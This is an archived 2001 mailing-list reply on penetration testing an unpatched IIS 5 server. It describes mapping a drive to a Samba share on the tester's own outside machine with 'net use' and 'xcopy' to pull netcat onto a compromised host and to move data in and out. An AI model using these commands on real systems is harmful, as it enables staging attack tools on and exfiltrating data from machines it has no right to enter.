Re: pen testing iis 5

From: Stephen Friedl (friedlat_private)
Date: Thu Jun 21 2001 - 15:31:24 PDT

    > I am pen-testing IIS 5 [no hotfixes] running in WinNT 4.0 with no fixes.
    > At this point I want to upload a file to the box [nc.exe] and then I will
    > definately have the box. How can I go about doing this?

    If the network can do outbound NETBIOS, I open up a public Samba share
    on a machine on MY network outside the firewall. Then, when hacking the
    remote machine I do

    	mkdir c:\foo				working area

    	net use q: \\my.box\public		think globally...

    	xcopy q:\nc.exe c:\foo			copy locally...

    Now the file is in your local work area, and it's a piece of cake
    to get stuff in and out via the "Q:" drive. Works like a champ.

    Steve

    ---
    Stephen J Friedl | Software Consultant | Tustin, CA |   +1 714 544-6561
    www.unixwiz.net  | I speak for me only |   KA8CMY   | steveat_private